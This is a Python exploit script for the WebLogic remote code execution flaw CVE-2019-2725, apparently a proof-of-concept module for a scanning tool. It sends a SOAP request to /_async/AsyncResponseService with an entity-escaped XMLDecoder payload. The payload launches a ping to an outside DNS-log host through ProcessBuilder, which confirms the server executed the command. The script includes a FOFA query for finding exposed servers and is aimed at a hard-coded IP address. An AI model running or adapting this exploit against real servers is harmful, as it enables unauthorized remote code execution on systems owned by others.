# coding:utf-8
import requests
import sys
import base64
requests.packages.urllib3.disable_warnings()

class c2Class(object):
    def __init__(self):
        self.vulname = 'weblogic 12 rce(CVE-2019-2725)'
        self.cveid='CVE-2019-2725'
        self.vulsystem= 'weblogic'
        self.vulversion = '10.*; 12.1.3'
        self.findtime='2019-4'
        self.fofa='app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"'
        self.refer= 'https://www.77169.net/html/260737.html\nhttps://zhuanlan.zhihu.com/p/345449257'
        self.testisok=False

        self.vulpath='/_async/AsyncResponseService'
        self.javace='<java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>ping thplia.dnslog.cn</string></void></array><void method="start" /></object></java>'
        self.payload= '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>org.slf4j.ext.EventData</string><void><string>%s</string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>'''%self.htmlescape(self.javace)
        # print(self.payload)
        self.headers={'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
        'Content-Type': 'text/xml',
        'Accept-Encoding': 'gzip, deflate',
        'SOAPAction':''}
        self.flag='Welcome to the {http://www.bea.com'
        self.flag1=200
        self.flag2=0

    def htmlescape(self,str):
    	escapeStr=''
    	for c in str:
    		escapeStr=escapeStr+'&#%s;'%(hex(ord(c))[2:])
    	return escapeStr

    def c2Func(self,target):
        status=0
        returnData=''
        try:
            if target.startswith(('http://','https://')):
                # 这是为了拿到 <http://主机名>这样格式的数据
                target=target+'/'
                target=target[:target.find('/',8)] # 在https://、http://的协议开头之后寻找/
            else:
                target='http://'+target
            url=target.strip('/')+self.vulpath
            resp=requests.get(url=url,verify=False,timeout=5)
            if self.flag in resp.content:           
                resp=requests.post(url=url,headers=self.headers,data=self.payload,verify=False,timeout=5)
                if self.flag1 == resp.status_code:
                	print(resp.content)
                if self.flag1 == resp.status_code and self.flag2 == len(resp.content):
                    returnData='%s is vuln(%s), vulnpath: %s'%(target,self.vulname,url)
                    status=1
        except Exception as e:
            returnData=str(e)
        return status,returnData

if __name__ == '__main__':
    target='https://42.194.226.30:5050'
    pocObj=c2Class()
    print(pocObj.c2Func(target))